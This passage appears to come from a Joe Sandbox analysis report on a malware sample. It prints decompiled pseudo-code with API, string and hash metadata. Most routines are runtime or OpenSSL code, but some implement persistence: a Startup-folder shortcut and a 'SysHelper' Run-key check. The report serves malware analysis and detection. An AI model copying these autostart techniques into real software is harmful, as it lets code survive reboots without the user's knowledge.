                                                                                    									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                                                                    									goto L16;
                                                                                    								}
                                                                                    								_push( *((intOrPtr*)(_t42 + 4)));
                                                                                    								goto L14;
                                                                                    							}
                                                                                    							E00420BED( *_t42);
                                                                                    							E00420BED(_t42);
                                                                                    							L8:
                                                                                    							goto L3;
                                                                                    						}
                                                                                    						E00420BED(_t42);
                                                                                    						goto L8;
                                                                                    					}
                                                                                    					L3:
                                                                                    					 *((intOrPtr*)(E00425208(_t48))) = 0xc;
                                                                                    					goto L4;
                                                                                    				}
                                                                                    			}












                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                    • String ID:
                                                                                    • API String ID: 1503006713-0
                                                                                    • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                    • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                    • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                    • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 84%
                                                                                    			E00425B6E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v32;
                                                                                    				intOrPtr _v36;
                                                                                    				signed int _v40;
                                                                                    				void* _t38;
                                                                                    				signed int _t45;
                                                                                    				signed int _t60;
                                                                                    				intOrPtr _t77;
                                                                                    				void* _t80;
                                                                                    				intOrPtr* _t82;
                                                                                    				signed int _t83;
                                                                                    				signed int _t86;
                                                                                    				intOrPtr _t88;
                                                                                    				void* _t92;
                                                                                    
                                                                                    				_t80 = __edx;
                                                                                    				_push(__ebx);
                                                                                    				_push(__esi);
                                                                                    				_t86 = 0;
                                                                                    				if(_a12 <= 0) {
                                                                                    					L5:
                                                                                    					return _t38;
                                                                                    				} else {
                                                                                    					_push(__edi);
                                                                                    					_t82 =  &_a12;
                                                                                    					while(1) {
                                                                                    						_t82 = _t82 + 4;
                                                                                    						_t38 = E004295C3(_a4, _a8,  *_t82);
                                                                                    						_t92 = _t92 + 0xc;
                                                                                    						if(_t38 != 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    						_t86 = _t86 + 1;
                                                                                    						if(_t86 < _a12) {
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							goto L5;
                                                                                    						}
                                                                                    						goto L20;
                                                                                    					}
                                                                                    					_push(0);
                                                                                    					_push(0);
                                                                                    					_push(0);
                                                                                    					_push(0);
                                                                                    					_push(0);
                                                                                    					E004242FD(0, _t80);
                                                                                    					asm("int3");
                                                                                    					_push(0x14);
                                                                                    					_push(0x507ab0);
                                                                                    					E00428520(0, _t82, _t86);
                                                                                    					_t66 = 0;
                                                                                    					_v32 = 0;
                                                                                    					__eflags = _a4 - 5;
                                                                                    					if(__eflags <= 0) {
                                                                                    						_t88 = E00425007();
                                                                                    						_v36 = _t88;
                                                                                    						E004245DC(0, _t82, _t88, __eflags);
                                                                                    						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                                                                    						_v8 = _v8 & 0;
                                                                                    						_t83 = E00428C96(0xb8, 1);
                                                                                    						_v40 = _t83;
                                                                                    						__eflags = _t83;
                                                                                    						if(_t83 != 0) {
                                                                                    							E00428AF7(0xc);
                                                                                    							_v8 = 1;
                                                                                    							E004255AC(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                    							E00425CE3();
                                                                                    							_t66 = E00425E97(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                                                                    							_v32 = _t66;
                                                                                    							__eflags = _t66;
                                                                                    							if(_t66 == 0) {
                                                                                    								E0042453C(_t83);
                                                                                    								_t43 = E004243E2(_t83);
                                                                                    							} else {
                                                                                    								__eflags = _a8;
                                                                                    								if(_a8 != 0) {
                                                                                    									_t60 = E00437413(_a8, 0x50a97c);
                                                                                    									__eflags = _t60;
                                                                                    									if(_t60 != 0) {
                                                                                    										 *0x510434 = 1;
                                                                                    									}
                                                                                    								}
                                                                                    								E00428AF7(0xc);
                                                                                    								_v8 = 2;
                                                                                    								_t25 = _t88 + 0x6c; // 0x6c
                                                                                    								E0042465C(_t25, _t83);
                                                                                    								E0042453C(_t83);
                                                                                    								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                                                                    								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                                                                    									__eflags =  *0x50aba8 & 0x00000001;
                                                                                    									if(( *0x50aba8 & 0x00000001) == 0) {
                                                                                    										E0042465C(0x50aae4,  *((intOrPtr*)(_t88 + 0x6c)));
                                                                                    										_t77 =  *0x50aae4; // 0x50aae8
                                                                                    										_t32 = _t77 + 0x84; // 0x50b030
                                                                                    										 *0x50b028 =  *_t32;
                                                                                    										_t33 = _t77 + 0x90; // 0x4d0da8
                                                                                    										 *0x50b084 =  *_t33;
                                                                                    										_t34 = _t77 + 0x74; // 0x1
                                                                                    										 *0x50a978 =  *_t34;
                                                                                    									}
                                                                                    								}
                                                                                    								_v8 = _v8 & 0x00000000;
                                                                                    								_t43 = E00425CF2();
                                                                                    							}
                                                                                    						}
                                                                                    						_v8 = 0xfffffffe;
                                                                                    						E00425D25(_t43, _t88);
                                                                                    						_t45 = _t66;
                                                                                    					} else {
                                                                                    						 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
                                                                                    						E004242D2();
                                                                                    						_t45 = 0;
                                                                                    					}
                                                                                    					return E00428565(_t45);
                                                                                    				}
                                                                                    				L20:
                                                                                    			}


















                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
                                                                                    • String ID:
                                                                                    • API String ID: 2762079118-0
                                                                                    • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                    • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                    • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                    • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 60%
                                                                                    			E00411B90(void* __ecx, WCHAR* __edx, void* _a4) {
                                                                                    				void* _v8;
                                                                                    				void* _v12;
                                                                                    				struct _ITEMIDLIST* _v16;
                                                                                    				char _v20;
                                                                                    				short _v532;
                                                                                    				char* _t30;
                                                                                    				intOrPtr* _t34;
                                                                                    				intOrPtr* _t35;
                                                                                    				intOrPtr* _t43;
                                                                                    				intOrPtr* _t48;
                                                                                    				intOrPtr* _t49;
                                                                                    				void* _t50;
                                                                                    				WCHAR* _t51;
                                                                                    				intOrPtr* _t54;
                                                                                    				intOrPtr* _t55;
                                                                                    				void* _t67;
                                                                                    				void* _t70;
                                                                                    
                                                                                    				_t51 = __edx;
                                                                                    				_v8 = 0;
                                                                                    				_v12 = 0;
                                                                                    				__imp__CoInitialize(0, _t67, _t70, _t50);
                                                                                    				_t30 =  &_v8;
                                                                                    				__imp__CoCreateInstance(0x4ce908, 0, 1, 0x4cd568, _t30);
                                                                                    				__imp__CoUninitialize();
                                                                                    				if(_t30 >= 0) {
                                                                                    					_t34 = _v8;
                                                                                    					_t30 =  *((intOrPtr*)( *_t34))(_t34, 0x4cf2e8,  &_v12);
                                                                                    					if(_t30 >= 0) {
                                                                                    						_t35 = _v8;
                                                                                    						_t30 =  *((intOrPtr*)( *_t35 + 0x50))(_t35, __ecx);
                                                                                    						if(_t30 >= 0) {
                                                                                    							SHGetSpecialFolderLocation(_a4, 7,  &_v16);
                                                                                    							__imp__SHGetPathFromIDListW(_v16,  &_v532);
                                                                                    							lstrcatW( &_v532, "\\");
                                                                                    							lstrcatW( &_v532, _t51);
                                                                                    							_t43 = _v12;
                                                                                    							_t30 =  *((intOrPtr*)( *_t43 + 0x18))(_t43,  &_v532, 1);
                                                                                    							if(_t30 >= 0) {
                                                                                    								GetSystemDirectoryW( &_v532, 0x100);
                                                                                    								lstrcatW( &_v532, L"\\shell32.dll");
                                                                                    								_t48 = _v8;
                                                                                    								_t30 =  *((intOrPtr*)( *_t48 + 0x44))(_t48,  &_v532, 1);
                                                                                    								if(_t30 >= 0) {
                                                                                    									_t49 = _v8;
                                                                                    									_t30 =  *((intOrPtr*)( *_t49 + 0x40))(_t49,  &_v532, 0x100,  &_v20);
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				_t54 = _v12;
                                                                                    				if(_t54 != 0) {
                                                                                    					_t30 =  *((intOrPtr*)( *_t54 + 8))(_t54);
                                                                                    				}
                                                                                    				_t55 = _v8;
                                                                                    				if(_t55 == 0) {
                                                                                    					return _t30;
                                                                                    				} else {
                                                                                    					return  *((intOrPtr*)( *_t55 + 8))(_t55);
                                                                                    				}
                                                                                    			}





















                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                    • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                    • CoUninitialize.OLE32 ref: 00411BD0
                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                    • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                    • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                    • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                    • String ID: \shell32.dll
                                                                                    • API String ID: 679253221-3783449302
                                                                                    • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                    • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                    • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                    • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E004549A0(void* __ebx) {
                                                                                    				signed int _v8;
                                                                                    				long _v12;
                                                                                    				void* _v16;
                                                                                    				void* _v24;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t21;
                                                                                    				CHAR* _t23;
                                                                                    				void* _t31;
                                                                                    				unsigned int _t34;
                                                                                    				struct HINSTANCE__* _t42;
                                                                                    				void* _t43;
                                                                                    				void* _t52;
                                                                                    				void* _t54;
                                                                                    				void* _t55;
                                                                                    				long _t56;
                                                                                    				signed int _t58;
                                                                                    				void* _t59;
                                                                                    
                                                                                    				_t43 = __ebx;
                                                                                    				E0042F7C0(0xc);
                                                                                    				_t21 =  *0x50ad20; // 0x84f4da2
                                                                                    				_v8 = _t21 ^ _t58;
                                                                                    				_t23 =  *0x512a94;
                                                                                    				if(_t23 != 0) {
                                                                                    					L12:
                                                                                    					if(_t23 == 0xffffffff) {
                                                                                    						goto L6;
                                                                                    					} else {
                                                                                    						 *_t23();
                                                                                    						return E0042A77E(_t43, _v8 ^ _t58, _t52, _t54, _t56);
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t42 = GetModuleHandleA(_t23);
                                                                                    					if(_t42 == 0) {
                                                                                    						_t23 =  *0x512a94;
                                                                                    					} else {
                                                                                    						_t23 = GetProcAddress(_t42, "_OPENSSL_isservice");
                                                                                    						 *0x512a94 = _t23;
                                                                                    					}
                                                                                    					if(_t23 != 0) {
                                                                                    						goto L12;
                                                                                    					} else {
                                                                                    						 *0x512a94 = 0xffffffff;
                                                                                    						L6:
                                                                                    						GetDesktopWindow();
                                                                                    						_t55 = GetProcessWindowStation();
                                                                                    						if(_t55 == 0 || GetUserObjectInformationW(_t55, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
                                                                                    							L14:
                                                                                    							return E0042A77E(_t43, _v8 ^ _t58, _t52, _t55, _t56);
                                                                                    						} else {
                                                                                    							_t56 = _v12;
                                                                                    							if(_t56 > 0x200) {
                                                                                    								goto L14;
                                                                                    							} else {
                                                                                    								_t56 = _t56 + 0x00000001 & 0xfffffffe;
                                                                                    								E0043F980(_t56 + 2, _t56);
                                                                                    								_t31 = _t59;
                                                                                    								_v16 = _t31;
                                                                                    								if(GetUserObjectInformationW(_t55, 2, _t31, _t56,  &_v12) == 0) {
                                                                                    									goto L14;
                                                                                    								} else {
                                                                                    									_t47 = _v16;
                                                                                    									_t34 = _v12 + 0x00000001 & 0xfffffffe;
                                                                                    									_v12 = _t34;
                                                                                    									_push(L"Service-0x");
                                                                                    									 *((short*)(_v16 + (_t34 >> 1) * 2)) = 0;
                                                                                    									E00421C02(_v16);
                                                                                    									asm("sbb eax, eax");
                                                                                    									return E0042A77E(_t43, _v8 ^ _t58, 0, _t55, _t56, _t47);
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}






















                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                    • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                    • GetDesktopWindow.USER32 ref: 004549FB
                                                                                    • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                    • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                    • _wcsstr.LIBCMT ref: 00454A8A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                    • String ID: Service-0x$_OPENSSL_isservice
                                                                                    • API String ID: 2112994598-1672312481
                                                                                    • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                    • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                    • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                    • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E00454AE0(void* __ebx, void* __edx, void* __edi, void* __esi, char _a4, char _a259, signed int _a260, wchar_t* _a268, void _a272) {
                                                                                    				CHAR* _v0;
                                                                                    				signed int _t17;
                                                                                    				void* _t19;
                                                                                    				void* _t46;
                                                                                    				void* _t49;
                                                                                    				void* _t50;
                                                                                    				signed int _t51;
                                                                                    				signed int _t52;
                                                                                    
                                                                                    				_t48 = __esi;
                                                                                    				_t47 = __edi;
                                                                                    				_t46 = __edx;
                                                                                    				_t39 = __ebx;
                                                                                    				E0042F7C0(0x108);
                                                                                    				_t17 =  *0x50ad20; // 0x84f4da2
                                                                                    				_a260 = _t17 ^ _t51;
                                                                                    				_t19 = GetStdHandle(0xfffffff4);
                                                                                    				if(_t19 == 0 || GetFileType(_t19) == 0) {
                                                                                    					vswprintf( &_a4, 0xff, _a268,  &_a272);
                                                                                    					_t52 = _t51 + 0x10;
                                                                                    					_a259 = 0;
                                                                                    					if(E004549A0(_t39) <= 0) {
                                                                                    						MessageBoxA(0,  &_a4, "OpenSSL: FATAL", 0x10);
                                                                                    						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t48);
                                                                                    					} else {
                                                                                    						_t49 = RegisterEventSourceA(0, "OPENSSL");
                                                                                    						_v0 =  &_a4;
                                                                                    						ReportEventA(_t49, 1, 0, 0, 0, 1, 0,  &_v0, 0);
                                                                                    						DeregisterEventSource(_t49);
                                                                                    						_t50 = _t48;
                                                                                    						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t50);
                                                                                    					}
                                                                                    				} else {
                                                                                    					E0042BDCC(E00420E4D() + 0x40, _a268,  &_a272);
                                                                                    					return E0042A77E(__ebx, _a260 ^ _t51 + 0x0000000c, _t46, __edi, __esi);
                                                                                    				}
                                                                                    			}












                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                    • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                    • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                      • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                    • vswprintf.LIBCMT ref: 00454B5D
                                                                                    • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                    • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                    • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                    • MessageBoxA.USER32 ref: 00454BD3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                    • String ID: OPENSSL$OpenSSL: FATAL
                                                                                    • API String ID: 277090408-1348657634
                                                                                    • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                    • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                    • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                    • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E00412360() {
                                                                                    				void* _v8;
                                                                                    				int _v12;
                                                                                    				int _v16;
                                                                                    				int _v20;
                                                                                    				char _v2066;
                                                                                    				short _v2068;
                                                                                    				short _v4116;
                                                                                    				signed int _t35;
                                                                                    
                                                                                    				E0042F7C0(0x1010);
                                                                                    				_v8 = 0;
                                                                                    				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v8) == 0) {
                                                                                    					_v12 = 1;
                                                                                    					_v2068 = 0;
                                                                                    					E0042B420( &_v2066, 0, 0x7fe);
                                                                                    					_v20 = 0x400;
                                                                                    					RegQueryValueExW(_v8, L"SysHelper", 0,  &_v12,  &_v2068,  &_v20);
                                                                                    					RegCloseKey(_v8);
                                                                                    					_v16 = 0;
                                                                                    					lstrcpyW( &_v4116,  *(CommandLineToArgvW(GetCommandLineW(),  &_v16)));
                                                                                    					_t35 = lstrcmpW( &_v4116,  &_v2068);
                                                                                    					asm("sbb eax, eax");
                                                                                    					return  ~_t35 + 1;
                                                                                    				} else {
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}












                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                    • _memset.LIBCMT ref: 004123B6
                                                                                    • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                    • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                    • lstrcpyW.KERNEL32 ref: 0041240E
                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                    Strings
                                                                                    • SysHelper, xrefs: 004123D6
                                                                                    • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                    • API String ID: 122392481-4165002228
                                                                                    • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                    • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                    • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                    • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 67%
                                                                                    			E00418000(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                    				signed int _v8;
                                                                                    				intOrPtr _t99;
                                                                                    				signed int _t102;
                                                                                    				signed int _t107;
                                                                                    				intOrPtr* _t108;
                                                                                    				intOrPtr _t110;
                                                                                    				intOrPtr _t111;
                                                                                    				intOrPtr _t112;
                                                                                    				intOrPtr _t113;
                                                                                    				intOrPtr _t115;
                                                                                    				intOrPtr* _t116;
                                                                                    				intOrPtr _t124;
                                                                                    				intOrPtr* _t136;
                                                                                    				intOrPtr _t148;
                                                                                    				intOrPtr _t149;
                                                                                    				intOrPtr _t160;
                                                                                    				intOrPtr _t161;
                                                                                    				intOrPtr _t162;
                                                                                    				intOrPtr _t183;
                                                                                    				intOrPtr _t185;
                                                                                    				intOrPtr* _t188;
                                                                                    				intOrPtr _t189;
                                                                                    				intOrPtr* _t190;
                                                                                    				intOrPtr* _t191;
                                                                                    				intOrPtr _t192;
                                                                                    				signed int _t193;
                                                                                    				intOrPtr _t197;
                                                                                    				intOrPtr* _t198;
                                                                                    				intOrPtr* _t199;
                                                                                    				intOrPtr* _t200;
                                                                                    				intOrPtr* _t201;
                                                                                    				intOrPtr* _t204;
                                                                                    				intOrPtr _t207;
                                                                                    				intOrPtr* _t208;
                                                                                    				intOrPtr* _t210;
                                                                                    				intOrPtr* _t213;
                                                                                    				intOrPtr* _t219;
                                                                                    				void* _t226;
                                                                                    
                                                                                    				_push(__ecx);
                                                                                    				_t219 = __ecx;
                                                                                    				_t213 = _a4;
                                                                                    				_t188 =  *((intOrPtr*)(__ecx + 0x10));
                                                                                    				if(_t188 < _t213) {
                                                                                    					L102:
                                                                                    					_push("invalid string position");
                                                                                    					E0044F26C(__eflags);
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					return  *_t188;
                                                                                    				} else {
                                                                                    					_t183 = _a16;
                                                                                    					_t99 =  *((intOrPtr*)(_a12 + 0x10));
                                                                                    					if(_t99 < _t183) {
                                                                                    						goto L102;
                                                                                    					} else {
                                                                                    						_t188 = _t188 - _t213;
                                                                                    						_t207 =  <  ? _t188 : _a8;
                                                                                    						_a8 = _t207;
                                                                                    						_t185 =  <  ? _t99 - _t183 : _a20;
                                                                                    						_t102 =  *((intOrPtr*)(__ecx + 0x10)) - _t207;
                                                                                    						_v8 = _t102;
                                                                                    						if((_t102 | 0xffffffff) - _t185 <= _v8) {
                                                                                    							_push("string too long");
                                                                                    							E0044F23E(__eflags);
                                                                                    							goto L102;
                                                                                    						} else {
                                                                                    							_t189 = _t188 - _t207;
                                                                                    							_t107 = _v8 + _t185;
                                                                                    							_a20 = _t189;
                                                                                    							_v8 = _t107;
                                                                                    							if( *((intOrPtr*)(__ecx + 0x10)) < _t107) {
                                                                                    								_push(0);
                                                                                    								E00415810(_t185, __ecx, _t213, _t107);
                                                                                    								_t189 = _a20;
                                                                                    								_t207 = _a8;
                                                                                    							}
                                                                                    							_t108 = _a12;
                                                                                    							if(_t219 == _t108) {
                                                                                    								__eflags = _t185 - _t207;
                                                                                    								if(_t185 > _t207) {
                                                                                    									__eflags = _a16 - _t213;
                                                                                    									if(_a16 > _t213) {
                                                                                    										__eflags = _t213 + _t207 - _a16;
                                                                                    										_t110 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                    										if(_t213 + _t207 > _a16) {
                                                                                    											__eflags = _t110 - 0x10;
                                                                                    											if(_t110 < 0x10) {
                                                                                    												_a12 = _t219;
                                                                                    											} else {
                                                                                    												_a12 =  *_t219;
                                                                                    											}
                                                                                    											__eflags = _t110 - 0x10;
                                                                                    											if(_t110 < 0x10) {
                                                                                    												_t190 = _t219;
                                                                                    											} else {
                                                                                    												_t190 =  *_t219;
                                                                                    											}
                                                                                    											__eflags = _t207;
                                                                                    											if(_t207 != 0) {
                                                                                    												__eflags = _a12 + _a16;
                                                                                    												E004205A0(_t190 + _t213, _a12 + _a16, _t207);
                                                                                    												_t207 = _a8;
                                                                                    												_t226 = _t226 + 0xc;
                                                                                    											}
                                                                                    											_t111 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                    											__eflags = _t111 - 0x10;
                                                                                    											if(_t111 < 0x10) {
                                                                                    												_a12 = _t219;
                                                                                    											} else {
                                                                                    												_a12 =  *_t219;
                                                                                    											}
                                                                                    											__eflags = _t111 - 0x10;
                                                                                    											if(_t111 < 0x10) {
                                                                                    												_t191 = _t219;
